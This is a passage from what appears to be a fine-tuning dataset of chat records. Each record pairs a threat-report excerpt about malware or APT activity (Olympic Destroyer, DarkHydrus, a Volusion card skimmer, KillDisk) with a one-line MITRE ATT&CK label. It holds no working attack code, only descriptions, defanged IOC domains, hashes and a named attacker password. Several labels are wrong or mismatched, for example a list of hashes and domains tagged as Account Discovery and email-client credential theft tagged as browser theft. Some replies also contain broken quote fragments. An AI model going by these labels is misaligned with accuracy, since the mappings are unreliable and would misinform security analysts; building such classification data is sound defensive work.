- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used a tool known as RemoteExec (similar to PsExec) to remotely execute batch scripts and binaries."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019"
- },
- {
- "role": "assistant",
- "content": "T1137.006 - Office Application Startup: Add-ins"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar has a command to open the command-line on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke has been regularly repacked by its operators to create large binaries and evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They then identify the Exchange server and attempt to install the OwaAuth web shell"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to execute the command \"ipconfig /all\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used large file sizes to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has used AutoIt to compile the payload and main script into a single executable after delivery."
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd."
- },
- {
- "role": "assistant",
- "content": "T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "YAHOYAH checks for the system’s Windows OS version and hostname."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has run the command `net user` on a victim."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BS2005 uses Base64 encoding for communication in the message body of an HTTP request."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can gather information regarding the user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can communicate over DNS with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak encrypts strings to make analysis more difficult."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encoding the encryption key In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can enumerate Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can stage files in a central location prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain a list of smart card readers attached to the victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs a reflective DLL injection using a given pid."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has been delivered with encrypted resources and must be unpacked for execution."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can collect the host's IP addresses using the \"ipconfig\" command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon copies itself to the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can decrypt AES encrypted C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AutoFocus customers may learn more from the DarkHydrus tag IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream fortiweb[.]download kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor execution begins from a scheduled task named `Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recent versions of Cherry Picker delete files and registry keys created by the malware."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has searched for folders associated with antivirus software."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use built-in modules to abuse trusted utilities like MSBuild.exe."
- },
- {
- "role": "assistant",
- "content": "T1127 - Trusted Developer Utilities Proxy Execution', 'T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has used mshta.exe to execute malicious VBScript."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda will delete their tools and files, and kill processes after their objectives are reached."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has used commands and API calls to gather system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the exfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn’t encode the stolen data or store the data in sessionStorage before the exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz has been spread through malicious links embedded in e-mails."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can send email over SMTP."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though QuasarRAT can only be run on Windows systems."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has been distributed through phishing emails containing a malicious URL."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to create to upload files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin’s thread"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
